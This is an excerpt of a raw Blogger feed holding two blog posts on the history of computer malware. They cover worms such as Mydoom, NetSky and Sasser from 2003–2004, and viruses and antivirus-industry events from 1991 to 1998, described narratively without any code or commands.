Sobig.f, infected millions of machines worldwide, opening ports to external access, and effectively crashed the SCO website.&lt;br /&gt;&lt;br /&gt;Mydoom.a did more than build on the success of its predecessors in creating the most severe epidemic in computer virology to date. The worm introduced a new technique as well. The backdoor installed by Mydoom was exploited by other malware authors, with new viruses that searched for the Mydoom backdoor component appearing immediately. Most of these newcomers penetrated machines via the backdoor, deleted Mydoom and installed themselves in place of Mydoom. 
Some of these copycats caused local outbreaks, and they all forced local segments of the Mydoom zombie network to work for the copycat virus writers instead.&lt;br /&gt;&lt;br /&gt;Thus, we saw yet another technique gain popularity:&lt;br /&gt;&lt;br /&gt;Using vulnerabilities or holes created by other viruses &lt;br /&gt;February 2004&lt;br /&gt;NetSky.b&lt;br /&gt;This email worm used the network of infected machines left in the wake of Backdoor.Agobot to spread. NetSky.b demonstrated most of the techniques listed above but also deleted a number of worms: Mydoom, Bagle and Mimail. The idea of a so-called 'antivirus' virus is not new. The first significant example of this supposedly helpful species, Welchia, appeared in 2003. Welchia not only penetrated computers to clean machines infected by Lovesan, it also attempted to download the Windows patch that closed the vulnerability exploited by Lovesan in the first place.&lt;br /&gt;&lt;br /&gt;NetSky not only deleted competitor viruses, but engaged their authors in a war of words, coding insults into the body of the virus. The writer of Mydoom did not take up the challenge, but the authors of Bagle picked up the gauntlet and the virus war began. 
At the peak of activity, three versions of each worm appeared in the space of one day.&lt;br /&gt;&lt;br /&gt;Setting aside the issue of verbal warfare, the authors of Bagle and NetSky introduced several innovations:&lt;br /&gt;&lt;br /&gt;Active deletion of competitor viruses &lt;br /&gt;Propagation in archived files (Bagle &amp; NetSky variants) &lt;br /&gt;Propagation in password-protected compressed files: passwords were either included as text strings or as graphics (Bagle) &lt;br /&gt;Abandoning propagation by email: instead, the malicious programs spread by directing infected machines to sites where the worm's body was downloaded or downloading the worm's body from previously infected machines (NetSky) &lt;br /&gt;The incidents listed above have not only had a serious influence on virus writers, but also on the evolution of the architecture and functionality of contemporary antivirus solutions.&lt;br /&gt;&lt;br /&gt;The move to abandon emailing the body of the worm is particularly significant. NetSky.q, a NetSky variant that spread by sending emails with links to previously infected machines, was immediately followed by Bizex. Bizex was the first ICQ worm; it penetrated machines via ICQ and sent all ICQ contacts found on newly infected machines links to a site where the body of the worm was located. Once users clicked on the link, the body of the worm would be downloaded from the infected web site and the cycle started again. Bizex successfully combined characteristics of Mitglieder (propagation via ICQ) and NetSky (sending links to infected web sites).&lt;br /&gt;&lt;br /&gt;March - May 2004&lt;br /&gt;Snapper and Wallon&lt;br /&gt;These Internet worms consolidated the techniques introduced by NetSky and Bizex. Both worms scanned email address books on infected machines and sent links to infected sites to all contacts in the local address books. 
Virus writers placed script Trojans on infected sites: these Trojans then exploited vulnerabilities in Internet Explorer to install the main components on victim machines.&lt;br /&gt;&lt;br /&gt;Even today, emails containing links are not treated by recipients with the appropriate caution. The user who is suspicious of emails with attachments will nevertheless cheerfully click on links supposedly sent by friends. Undoubtedly, this technique will continue to be used until users learn to treat links sent via email with the same wariness that they display towards email attachments. It seems likely that the continual discovery of new vulnerabilities in Internet Explorer and Outlook will only add fuel to the fire.&lt;br /&gt;&lt;br /&gt;Sasser&lt;br /&gt;The final ground-breaking virus of 2004 to date was Sasser, which appeared in late April. This Internet worm exploited a critical vulnerability in MS Windows, and spread in a similar way to Lovesan, connecting directly to the victim machine via the Internet. Sasser caused a serious outbreak in Europe and left behind an FTP-server vulnerability that was immediately picked up by Dabber and Cycle. When Sven Jaschan, the teenage author of Sasser, was arrested, he admitted to also being the author of the NetSky family.&lt;br /&gt;&lt;br /&gt;The arrest of a virus writer so soon after the release of a new malicious program made history. &lt;br /&gt;&lt;br /&gt;Sasser was evidence that virus writers recycle and plagiarize successful techniques: Jaschan used techniques exploited by Lovesan, and other virus writers in turn immediately picked up on his ideas.&lt;br /&gt;&lt;br /&gt;Plexus&lt;br /&gt;Plexus made history by becoming the first worm since Nimda (2001) to use all available propagation techniques: the Internet, email, P2P networks and LANs. 
Three years had passed since any virus writer utilized so many resources simultaneously.&lt;br /&gt;&lt;br /&gt;Plexus was potentially an extremely dangerous worm based on the Mydoom source code. Here the virus writer followed in the footsteps of Sober's author. Parts of Sober were pure plagiarism, resulting in a worm which was more successful than some of the malicious program 'donors'.&lt;br /&gt;&lt;br /&gt;Fortunately, no version of Plexus caused a serious outbreak, most likely because none of them used spammer mass mailing techniques for initial propagation. Nor did the author of these worms use any effective social engineering techniques. However, should they or somebody else choose to create new versions which correct these failings, the world may be at risk of a serious outbreak.&lt;br /&gt;&lt;br /&gt;Beyond worms&lt;br /&gt;The worms described above caused the most publicized outbreaks in recent IT history. However, other types of malware can pose a serious threat to computer and data security; it is therefore important to evaluate the total picture, including non-Windows environments, in order to gain a complete picture of current trends.&lt;br /&gt;&lt;br /&gt;Other Malware&lt;br /&gt;Trojans&lt;br /&gt;Trojans are often perceived as being less dangerous than worms, as they cannot replicate or travel independently. However, this is a misconception: most of today's malware combines several components, and many worms carry Trojans as part of their payload. These Trojans also lay the foundations for bot networks.&lt;br /&gt;&lt;br /&gt;Trojans themselves are becoming more sophisticated. Trojan spy programs are proliferating, with dozens of new versions appearing every week. These versions are all slightly different, but developed with one aim in mind: to steal confidential financial information.&lt;br /&gt;&lt;br /&gt;Some of these programs are simple key loggers, which send a record of keyboard activity to the author or user of the program. 
The more elaborate versions offer complete control over victim machines, sending data to remote servers and receiving and executing commands.&lt;br /&gt;&lt;br /&gt;Total control over victim machines is often the goal for Trojan writers. Infected machines are usually joined in a bot network, often using IRC channels or web sites where the coder puts new commands. The more complex Trojans, such as many Agobot variants, unite all infected machines into a single P2P network.&lt;br /&gt;&lt;br /&gt;Once bot networks have been created, they are rented out to spammers or used to conduct DDoS attacks. The escalating commercialization of virus writing is leading to increased sophistication in bot network creation.&lt;br /&gt;&lt;br /&gt;Trojan droppers and downloaders&lt;br /&gt;Both droppers and downloaders have one goal: to install an additional piece of malware, be it a worm or another Trojan, on the victim machine. They differ from Trojans simply in the methods which they use.&lt;br /&gt;&lt;br /&gt;Droppers either install another malicious program or a new version of previously installed malware. Droppers can carry several completely unrelated pieces of malware, which may display different behaviours and may even be written by different authors. In effect, droppers act as an archiver which can compress many different kinds of malware.&lt;br /&gt;&lt;br /&gt;Droppers are often used to carry known Trojans. This is because it is significantly easier to write a dropper than a new Trojan, and to ensure that the dropper cannot be detected by antivirus solutions. Most droppers are written in VBS and JS, which accounts for their popularity; the languages themselves are relatively simple, with cross-platform application.&lt;br /&gt;&lt;br /&gt;Virus writers often use downloaders in the same way as droppers. However, downloaders can be more useful than droppers. Firstly, downloaders are much smaller than droppers. 
Secondly, they can be used to download endless new versions of the targeted malware. Like droppers, downloaders are usually written in script languages such as VBS and JS, but they also often exploit Internet Explorer vulnerabilities.&lt;br /&gt;&lt;br /&gt;Moreover, both droppers and downloaders are used not only to install other Trojans, but also other malicious programs such as adware and pornware.&lt;br /&gt;&lt;br /&gt;Classic File Viruses&lt;br /&gt;Classic file viruses reigned supreme in the 90s; however, they have almost totally disappeared today. There are currently about 10 file viruses that are still active. They experience peaks of activity when they infect the executable files of worms: the file virus will then travel as far as the infected worm file. For instance, we often see samples of MyDoom, Netsky and Bagle that are infected by file viruses such as Funlove, Xorala, Parite or Spaces.&lt;br /&gt;&lt;br /&gt;On the whole, there is very little danger that classic file viruses will cause any major epidemics. Even Rugrat, the first proof of concept virus for Win64, is unlikely to change the situation in the foreseeable future.&lt;br /&gt;&lt;br /&gt;Other Environments&lt;br /&gt;Linux&lt;br /&gt;To date Linux-based platforms have mainly been the victims of rootkit attacks and simple file viruses. However, the growing number of publicized vulnerabilities means that the increased number of users switching to Linux will not remain untouched by new malware.&lt;br /&gt;&lt;br /&gt;Handhelds&lt;br /&gt;PDAs are now almost household appliances. Virus writers have not been slow to take advantage of their growing popularity. The first Trojan for Palm OS appeared in September 2000. The first proof of concept virus for Pocket PC, Duts, was slower to arrive, finally appearing in July 2004. So far there have not been any serious virus outbreaks in the world of handhelds, but it is only a question of time. 
Once virus writers decide that information saved on handhelds is worth accessing, malware for these devices will undoubtedly evolve rapidly.&lt;br /&gt;&lt;br /&gt;Mobile Phones&lt;br /&gt;Mobile phones have come a long way, and are now both complex and widely used. These two factors are bound to attract the attention of virus writers, particularly with the advent of smart phones, which effectively have computer functionality. The first proof of concept virus for smartphones running Symbian OS appeared in June 2004. The only missing factor is commercial use - once virus writers identify a way to make money by exploiting cell phones, viruses will inevitably appear.</content><link rel='replies' type='application/atom+xml' href='http://virusopedia.blogspot.com/feeds/3026555115619200654/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=2383994250717691599&amp;postID=3026555115619200654' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/3026555115619200654'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2383994250717691599/posts/default/3026555115619200654'/><link rel='alternate' type='text/html' href='http://virusopedia.blogspot.com/2008/06/venture-capital-win-32-virohistory.html' title='The Venture Capital Win 32 ViroHistory'/><author><name>PROF. 
SJAFW</name><uri>http://www.blogger.com/profile/00700919093101522027</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='18053836773761000586'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2383994250717691599.post-8059337025753580007</id><published>2008-06-07T09:56:00.000-07:00</published><updated>2008-06-07T09:59:56.004-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='some how'/><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='entropy'/><category scheme='http://www.blogger.com/atom/ns#' term='soombie'/><category scheme='http://www.blogger.com/atom/ns#' term='third decade'/><category scheme='http://www.blogger.com/atom/ns#' term='malicious'/><category scheme='http://www.blogger.com/atom/ns#' term='diseases'/><category scheme='http://www.blogger.com/atom/ns#' term='history'/><category scheme='http://www.blogger.com/atom/ns#' term='Computer Virus'/><category scheme='http://www.blogger.com/atom/ns#' term='decade'/><title type='text'>The Third decade of Malware History</title><content type='html'>1991-1992&lt;br /&gt;1991&lt;br /&gt;The computer virus population continues to grow, reaching the 300 mark. As the number and severity of virus incidents escalated, the need for reliable security rose proportionally. Early 1991 saw the appearance of more AV products: Norton AntiVirus from Peter Norton who now believed in viruses; Central Point Antivirus; Untouchable from Fifth Generation System. 
The latter were bought out by Symantec in 1993 and 1994.&lt;br /&gt;&lt;br /&gt;Other virus writer bulletin boards modeled after the VX BBS and new personalities emerged from the computer underground: Cracker Jack (Italy - the Italian Research Laboratory BBS), Gonorrhea (Germany), Demoralized Youth (Switzerland), Hellpit (USA) and Dead on Arrival and Semaj (UK). The computer underground was forming.&lt;br /&gt;&lt;br /&gt;Tequila, a polymorphic boot infector, caused a significant epidemic in April of this year. It was created by a Swiss programmer exclusively for research purposes and without malicious intent. However, one copy of the virus was stolen by an acquaintance who consciously infected other users.&lt;br /&gt;&lt;br /&gt;The summer of 1991 saw a virus epidemic with Dir_II using a fundamentally new means of infecting files: link-technology. This virus, to this day, remains the only example of this type detected in the wild.&lt;br /&gt;&lt;br /&gt;Altogether, 1991 was relatively calm; a calm before the storm that broke in 1992.&lt;br /&gt;&lt;br /&gt;1992&lt;br /&gt;Viruses for non IBM-compatible and non MS-DOS systems fade from the foreground at this time. Loopholes in global networks were closed, errors corrected, and network worms lost the conditions they required to spread - at least for the time being!&lt;br /&gt;&lt;br /&gt;Instead, boot sector viruses were gaining popularity on the more commonly used operating systems (MS-DOS) on the most widely used platforms (IBM-PC). The number of viruses grew astronomically and security incidents occurred almost every day. New antivirus programs continued to appear, as did several books and a number of regular publications dedicated to viruses. This was the background for some important developments in virus writing.&lt;br /&gt;&lt;br /&gt;In the beginning of 1992 the first polymorphic generator, MTE, appeared. Its primary purpose is to integrate with other viruses to facilitate their polymorphism. 
The author of this program, the infamous Dark Avenger, did everything possible to ease the work of his colleagues in this area. The MTE generator was delivered in the form of a ready to use module and was accompanied by documentation.&lt;br /&gt;&lt;br /&gt;Due to MTE, several polymorphic viruses immediately appeared. MTE was also the forerunner of several other polymorphic generators, creating a headache for many antivirus companies. Even after months of work, many antivirus companies were unable to reach 100% results in detecting well-known versions of polymorphic viruses created with the help of MTE.&lt;br /&gt;&lt;br /&gt;The first anti-antivirus programs appeared during this year. Peach was one of the first: it deleted the database of Central Point AntiVirus's change inspector. If the antivirus program was unable to locate its database, then it acted as if it had been installed for the first time, recreating the database. In this way viruses avoided detection, and slowly infected the entire system.&lt;br /&gt;&lt;br /&gt;Law enforcement agencies worldwide began developing departments specializing exclusively in computer crimes. For example, the Computer Crime Unit of The New Scotland Yard successfully disarmed the English virus group, ARCV (Association for Really Cruel Viruses). Great Britain's proactive law enforcement position practically neutralized computer underground activity and even now, we are unaware of any serious organized groups of virus-writers there.&lt;br /&gt;&lt;br /&gt;In March of 1992, we witnessed the Michelangelo (or March6) outbreak and the media hype in advance (the virus itself was first detected in 1991, but caused an outbreak in 1992). Though some experts predicted that over 5 million machines would be infected, only a few thousand machines actually suffered.&lt;br /&gt;&lt;br /&gt;The VCL and PS-MPC virus constructors first appeared in July 1992. 
They allowed people to create their own viruses by adding a range of malicious payloads to the constructors. This increased the number and potentially destructive effect of viruses, as did MTE.&lt;br /&gt;&lt;br /&gt;1992 also brought Win.Vir_1_4, the first virus for Windows. Win.Vir_1_4 infected operating system executable files. Despite the fact that the virus was poorly coded, had limited propagation ability, and had no special Windows functionality, it nevertheless opened a new chapter in the history of computer viruses.&lt;br /&gt;&lt;br /&gt;On the antivirus vendor front, Symantec bought Certus International along with their proprietary antivirus product, Novi.&lt;br /&gt;&lt;br /&gt;1993-1995&lt;br /&gt;1993&lt;br /&gt;Virus writers began to take their work seriously. The computer underground had already mastered an array of new polymorphic generators and constructors, and founded new electronic publications. This year saw new viruses which employed new techniques to infect files, penetrate systems, destroy data and conceal themselves from antivirus applications.&lt;br /&gt;&lt;br /&gt;One such example is the PMBS virus, which worked in the secure regime of Intel 80386 processors. Another example was the Strange (or Hmm) virus, the only stealth virus that operated at the level of the hardware interrupts INT 0Dh and INT 76h.&lt;br /&gt;&lt;br /&gt;Carbuncle signaled a new generation of companion viruses. A number of other viruses like Emmie, Bomber, Uruguay, and Cruncher employed fundamentally new techniques to conceal themselves in the code of infected files.&lt;br /&gt;&lt;br /&gt;The spring of 1993 turned out to be a nerve-wracking time for many antivirus vendors: Microsoft released its own antivirus program. Microsoft AntiVirus (MSAV) was based on the former Central Point AntiVirus (CPAV). The program was included in the standard delivery of MS-DOS and Windows operating systems. 
The first tests conducted by independent testing laboratories showed a high level of effectiveness. However, later on, its quality began to slowly decline and the project was discontinued.&lt;br /&gt;&lt;br /&gt;1994&lt;br /&gt;More and more significance is attached to the problem of viruses on CDs. Having quickly become popular, this removable storage medium became one of the primary ways of spreading viruses. Several incidents were registered when a virus was discovered on the master-disc of a compact disc producer. As a result, the computer market was flooded with relatively large shipments (tens of thousands) of infected discs. Naturally, such carriers could not be disinfected; they could only be destroyed.&lt;br /&gt;&lt;br /&gt;At the beginning of the year, two extremely complex polymorphic viruses appeared in the UK: SMEG.Pathogen and SMEG.Queeg - even now, not all antivirus programs are able to detect these programs with 100% certainty. The virus writer placed the infected files on BBS boards and caused both an outbreak and a panic in the mass media.&lt;br /&gt;&lt;br /&gt;The GoodTimes hoax caused yet another panic. GoodTimes allegedly spread via the Internet and infected computers via email. However, sometime later, an ordinary DOS virus containing the text Good Times appeared and was named GT-Spoof.&lt;br /&gt;&lt;br /&gt;Many other unusual viruses appeared this year:&lt;br /&gt;&lt;br /&gt;January - Shifter - the first virus to infect OBJ files. &lt;br /&gt;Phantom1 - the first polymorphic virus in Moscow. &lt;br /&gt;April - ScrVir - a family of viruses which infects source code programs in C and Pascal. &lt;br /&gt;June - OneHalf - a complex and dangerous polymorphic virus causes a significant outbreak: in fact, this virus is still active and can cause real damage to this day. 
&lt;br /&gt;September - Zaraza - an MS-DOS file-loading virus caused a significant outbreak by using a unique installation method: the new technique temporarily stumped the antivirus experts. &lt;br /&gt;This year also marked several significant developments in the antivirus field.&lt;br /&gt;&lt;br /&gt;In June, one of the leading antivirus vendors was purchased by Symantec, who had already earned a reputation for acquiring other antivirus projects.&lt;br /&gt;&lt;br /&gt;AntiViral Toolkit Pro was launched in September. Eugene Kaspersky's first product immediately won top marks in a series of independent tests conducted by Hamburg University.&lt;br /&gt;&lt;br /&gt;1995&lt;br /&gt;Nothing significant occurred in the field of DOS-viruses this year, although several complex viruses such as Nightfall, Nostradamus, and Nutcracker appeared. There were also some interesting new viruses such as the 'bisexual' RMNS virus and the BAT virus, Winstart. There were also two widespread, but not severe outbreaks caused by ByWay and DieHard2.&lt;br /&gt;&lt;br /&gt;In February, Microsoft sent infected versions of Windows 95 to beta-testers, but only one person thought to run an antivirus check. He discovered that the discs were infected by Form, and testing was put off until clean discs were issued.&lt;br /&gt;&lt;br /&gt;In the Spring of 1995, two antivirus companies announced an alliance: ESaSS (the developer of ThunderBYTE Anti-Virus) and Norman Data Defense Systems (Norman Virus Control). These companies, both with their own very strong independent antivirus products, decided to combine efforts to develop a single antivirus system. 
Later on, in 1998, this alliance would crumble with a buy-out of the Dutch ESaSS by a Norwegian company.&lt;br /&gt;&lt;br /&gt;In August, the Concept virus struck MS Windows: the virus circled the globe in only a month and was number one on antivirus vendors' lists of most common viruses.&lt;br /&gt;&lt;br /&gt;In the first half of September, one of the world's largest computer manufacturers, Digital Equipment Corporation (DEC), accidentally distributed copies of the Concept virus to delegates at a DECUS conference taking place in Dublin. Fortunately, the virus was quickly detected and the outbreak contained. Over a hundred known versions of the Concept virus are still in circulation today.&lt;br /&gt;&lt;br /&gt;Green Stripe, a virus for AmiPro, a then popular word-processing program, also spread rapidly. The source code for Green Stripe was published as a free supplement to Mark Ludwig's magazine Underground Technology Review.&lt;br /&gt;&lt;br /&gt;The advent of macro viruses posed a new set of challenges for antivirus vendors. New technologies were needed to detect macro viruses; first in MS Word and eventually in other MS Office applications.&lt;br /&gt;&lt;br /&gt;The English affiliate of the Ziff-Davis publishing house distinguished itself twice in 1995. The first time was in September, when the publishing house's PC Magazine (English version) distributed a diskette containing the Sampo virus to its subscribers. This was soon discovered, and the company offered its apologies and gave readers a free antivirus utility. The irony of the event lay in the fact that the diskette was a supplement for an issue which contained articles on the results of antivirus tests for Novell NetWare products.&lt;br /&gt;&lt;br /&gt;Later, in the middle of December, another Ziff-Davis publication, Computer Life, sent its readers a diskette containing a Christmas greeting. 
Unfortunately, it turned out that the diskette also contained the Parity Boot virus.&lt;br /&gt;&lt;br /&gt;Law enforcement agencies also pressed onward in the struggle against cyber crime. On January 16, New Scotland Yard's Computer Crime Unit took Christopher Pile to court for writing and distributing viruses. The unemployed Pile, or the Black Baron, as he was known in the underground, was accused of authoring the Queeg and Pathogen viruses as well as the SMEG polymorphic generator. After ten months Pile pleaded guilty and was sentenced to 18 months in prison.&lt;br /&gt;&lt;br /&gt;1997&lt;br /&gt;In February of 1997, Linux Bliss, the first virus for the Linux operating system, appeared. Viruses had moved to yet another environment. Although Linux viruses are a rarity, they have evolved since their first appearance. Viruses which run in the background have been developed for Linux, as well as a number of viable Trojans for this platform. If Linux were even half as popular as Windows, the number of viruses for Linux would be far greater than the number which actually exist for this platform.&lt;br /&gt;&lt;br /&gt;The release of Microsoft's Office 97 was notable for the fact that macro viruses almost immediately migrated towards this application. The limited payloads (or in some cases the total absence thereof) of macro viruses created for MS Word 5.0 and Excel 5.0 resulted from a completely new version of Visual Basic for Applications, VBA 5.0, which differed significantly from Word Basic and VBA 3.0. The first viruses for MS Office 97 turned out to be almost identical to their predecessors, simply converted into a new format. 
Nevertheless, new macro viruses developed exclusively for MS Office 97 soon appeared.&lt;br /&gt;&lt;br /&gt;March 1997 was notable for the appearance of the 'ShareFun' macro virus for MS Word 6/7, which started a new chapter in computer history. It became the first virus of its kind to spread using email, in particular MS Mail.&lt;br /&gt;&lt;br /&gt;In April of 1997 the Homer virus was detected; this was the first network worm which used FTP to propagate.&lt;br /&gt;&lt;br /&gt;June 1997 brought the first self-encrypting virus for Windows 95, Win95.Mad. The virus, of Russian origin, was sent out to several BBS stations in Moscow, causing a major epidemic.&lt;br /&gt;&lt;br /&gt;The 'Esperanto' virus was born in November 1997. It was an attempt, fortunately unsuccessful, to create a multi-platform virus which would be able to infect DOS, Windows and MacOS.&lt;br /&gt;&lt;br /&gt;The development of the Internet, and in particular the appearance of mIRC (Internet Relay Chat), sparked a great deal of interest, including that of virus writers. It didn't take long for malicious programs to start appearing. In December of 1997, the antivirus world publicized the appearance of a fundamentally new type of computer worm which spread via IRC channels. An analysis of mIRC, one of the more popular IRC utilities, showed a dangerous security loophole. The directory for files downloaded via IRC coincided with the directory which held the SCRIPT.INI command file. The SCRIPT.INI file, which contained the body of the worm, could therefore be transferred to a remote computer, where it would automatically replace the original command file. When restarted, mIRC would activate the malicious code, and the worm would then send itself to other users. This error was quickly corrected and the rather primitive IRC worms had disappeared by summer. However, multi-component IRC worms which actively searched for SCRIPT.INI files (in mIRC clients), EVENTS.INI files (in pIRCh clients) and others later appeared, working in a similar way to email worms: the user would receive an EXE, COM or BAT file which, when launched, would replace the original command file.&lt;br /&gt;&lt;br /&gt;One of the more important events of 1997 was the split-off of one of the KAMI firm's divisions, led by Evgenii Kaspersky. This division became an independent company known as 'Kaspersky Labs', which is today recognized as a technical leader in the antivirus industry. Since 1994, the company's main product, AntiViral Toolkit Pro, has consistently shown high results in numerous tests conducted by various testing laboratories across the world. The formation of an independent legal entity allowed a small group of developers to become, within two years, one of its own country's domestic leaders in addition to being generally well-known internationally. Little time was required to develop and release versions with new antivirus security technologies for virtually all popular platforms, and to create a network of international distribution and technical support.&lt;br /&gt;&lt;br /&gt;In October 1997, Kaspersky Lab and the Finnish company Data Fellows (later renamed F-Secure Corporation) signed an agreement to license an antivirus engine for use in Data Fellows' newest product, FSAV (F-Secure Anti-Virus). Prior to this, Data Fellows had been well-known as the developer of the F-PROT antivirus.&lt;br /&gt;&lt;br /&gt;1997 will also long be remembered as a year of petty squabbles. Several scandals evolved at the same time between some of the larger antivirus manufacturers. At the beginning of the year, McAfee announced that they had discovered a 'bookmark' in the programs of one of their main competitors, the antivirus firm Dr. Solomon's. McAfee's announcement went on to say that if Dr. Solomon's antivirus program discovered several viruses during a scan-check, then it completed its work in an elevated mode. 
In other words, if the program worked in a normal mode under normal conditions, then when testing for several viruses it switched to an intense mode (or, in McAfee's words, a 'cheat mode') which allowed the detection of viruses previously invisible to Dr. Solomon's in normal scanning mode. As a result, the testing of uninfected discs showed good speed results and the scan tests of virus collections showed good detection results.&lt;br /&gt;&lt;br /&gt;Dr. Solomon's response was not long in coming, and the company soon filed suit against McAfee's recent marketing campaign which claimed that McAfee was 'The Number One Choice Worldwide. No Wonder The Doctor's Left Town'. This was an obvious reference to Alan Solomon, the founder of Dr. Solomon's, who had, in fact, earlier transferred control of his company to its senior management.&lt;br /&gt;&lt;br /&gt;Perhaps even more scandalous was the affair of the Taiwanese developer Trend Micro, which accused two of the leading antivirus companies, McAfee and Symantec, of violating its patent on virus scan-checking technology via the Internet and electronic mail. Shortly afterward Symantec leapt into the fray with its own accusations, alleging that McAfee was guilty of using code from Symantec's Norton AntiVirus.&lt;br /&gt;&lt;br /&gt;The year came to a close with McAfee Associates and Network General announcing their intent to merge into a single company, Network Associates Inc (NAI), in order to diversify into other computer security systems as well (such as encryption, multi-networked screens, network scans, etc.). However, at the end of 1999 NAI's management decided to bring new life into the McAfee brand and line of antivirus products, and the company reverted to its old name.&lt;br /&gt;&lt;br /&gt;1998&lt;br /&gt;Virus attacks on MS Windows, MS Office and network applications continued apace, with viruses exploiting new infection vectors and using ever more complex technologies. 
A wide range of Trojan programs designed to steal passwords (the PSW family) and remote administration utilities (Backdoor) appeared. Several computer magazines distributed discs which were infected with the Windows viruses CIH and Marburg. Specifically, compact discs attached to the English, Slovenian, Swiss and later Italian versions of PC Gamer contained the Marburg virus. This virus was also contained in the electronic registration program of an MGM Interactive disc with the game Wargames PC. At the end of September, the AutoStart virus was discovered on discs which were to be distributed with Corel DRAW 8.1 for Mac OS.&lt;br /&gt;&lt;br /&gt;The beginning of the year brought an epidemic caused by a whole family of viruses, Win32.HLLP.DeTroi, which not only infected Win32 EXE files but were also capable of transmitting information about victim machines to the author of the virus. Because the virus exploited system libraries used only in the French version of Windows, the epidemic affected only French-speaking countries.&lt;br /&gt;&lt;br /&gt;In February, the Excel4Paix (or Formula.Paix) virus was detected. This new macro virus installed itself in Excel tables by using an unusual macro area of formulas which were capable of containing self-replicating code. Later the same month, polymorphic Win32 viruses emerged: Win95.HPS and Win95.Marburg. Furthermore, they were detected in the wild. Antivirus developers were forced to rapidly develop new methods of detection for polymorphic viruses which, until then, had existed only for DOS.&lt;br /&gt;&lt;br /&gt;AccessiV, the first virus for Microsoft Access, was detected in March. Unlike the earlier Word.Concept and Excel.Laroux viruses, it did not cause much alarm, as most users had come to accept that Microsoft applications are highly vulnerable. 
At approximately the same time, another virus called Cross surfaced. This was the first multi-platform macro virus capable of infecting documents simultaneously in two Microsoft Office applications, Word and Access. On the heels of Cross, several other macro viruses materialized, transferring their code from one Office application to another. The most notable of these was Triplicate (also known as Tristate), which was capable of infecting Word, Excel and PowerPoint.&lt;br /&gt;&lt;br /&gt;In May of 1998, the Red Team virus became the first virus to infect Windows EXE files and distribute itself using the Eudora email client. June brought the Win95.CIH virus, which caused an epidemic of mass and then later global proportions, infecting computer networks and home computers by the thousand. The beginning of the epidemic was pin-pointed to Taiwan, where an unknown hacker sent infected files to a local electronic list-serve. From there the virus spread to the States, where infected files made it onto several popular web servers and spread the virus to gaming programs. It was most likely the game servers that acted as the primary reason for the large-scale epidemic, which continued throughout the year. The virus leap-frogged in 'popularity' over earlier virus superstars such as Word.CAP and Excel.Laroux. Most notable was the virus payload: depending on the day of infection, the virus would erase the Flash BIOS, which in some cases could make it necessary to replace the motherboard. CIH's complex procedures caused antivirus products to significantly increase their speed of development.&lt;br /&gt;&lt;br /&gt;In August of 1998 the emergence of BackOrifice (or Backdoor.BO) caused controversy: it was designed to be a secret utility to be used for remote host administration across networks. Other similar viruses such as NetBus and Phase appeared shortly thereafter.&lt;br /&gt;&lt;br /&gt;August also saw the emergence of the first malicious executable Java module, Java.StrangeBrew. 
This virus did not present a specific danger to Internet users, but it did illustrate the fact that viruses can also be found in applications actively used in viewing Web servers.&lt;br /&gt;&lt;br /&gt;In November 1998, malicious programs continued to evolve, with three viruses infecting Visual Basic scripts (VBS files) which were actively used in creating webpages. At the time, Kaspersky Labs released an in-depth study on the potential threat of VBS viruses. However, many specialists were too quick to label the company a panic inciter and criticized the study for provoking virus hysteria. Half a year later, when the LoveLetter epidemic broke, it became clear that Kaspersky's prognosis was completely accurate. To this day, this type of virus holds onto first place in the list of most widespread and dangerous virus types.&lt;br /&gt;&lt;br /&gt;The logical culmination of VBScript viruses was full-fledged HTML viruses like HTML.Internal. It became patently clear that virus writers' efforts were beginning to focus more and more on network applications. Virus writers were moving towards network worms which exploited flaws in MS Windows and Office and infected remote computers through Web servers or via email.&lt;br /&gt;&lt;br /&gt;The next MS Office application to fall victim to a virus was PowerPoint. In December 1998, a virus of unknown origins, Attach, was the first to attack. It was immediately followed by two more, ShapeShift and ShapeMaster, whose author was likely one and the same. The appearance of PowerPoint viruses caused yet another headache for antivirus vendors. Files of this MS application use the OLE2 format, which determines the way in which viruses can be scanned for in DOC and XLS files. However, the VBA modules in PPT format are stored in compressed form, which meant that it was necessary to design new algorithms to decompress them and facilitate antivirus searches. 
Despite the complexity of what would seem like a simple task, almost all antivirus companies have integrated into their products the necessary functionality to defend against PowerPoint viruses.&lt;br /&gt;&lt;br /&gt;In January, Virus Bulletin magazine began a new project: VB 100%. This regular testing of antivirus products is designed to determine whether the solutions can detect 100% of viruses from the wild. VB 100% is now regarded as one of the more respected independent testers.&lt;br /&gt;&lt;br /&gt;Significant changes occurred in the antivirus vendor market as well. In May, Symantec and IBM announced their unified efforts to develop an antivirus product. The combined product was to be distributed by Symantec under the same name, while IBM's product, IBM Anti-Virus, would cease to exist. Towards the end of September, Symantec announced its purchase of the antivirus business from Intel Corporation, LANDesk Virus Protect. Just two weeks later, Symantec surprised the industry yet again with another purchase, this time of QuarterDeck for $65 million. The company's product range included such antivirus products as ViruSweep.&lt;br /&gt;&lt;br /&gt;Such aggressive tactics did not go unnoticed by the American antivirus giant NAI, which on August 13th announced its purchase of one of its primary competitors, the English company Dr. Solomon's. The latter was bought for the record amount of $640 million by means of a stock swap. These events evoked true shock in the antivirus industry. A previous conflict between two large players of the industry had ended in a buy-sell deal, the result of which was the disappearance of one of the more noticeable and technologically strong developers of antivirus software.&lt;br /&gt;&lt;br /&gt;Also interesting was the purchase of EliaShim, a developer of the antivirus product E-Safe. 
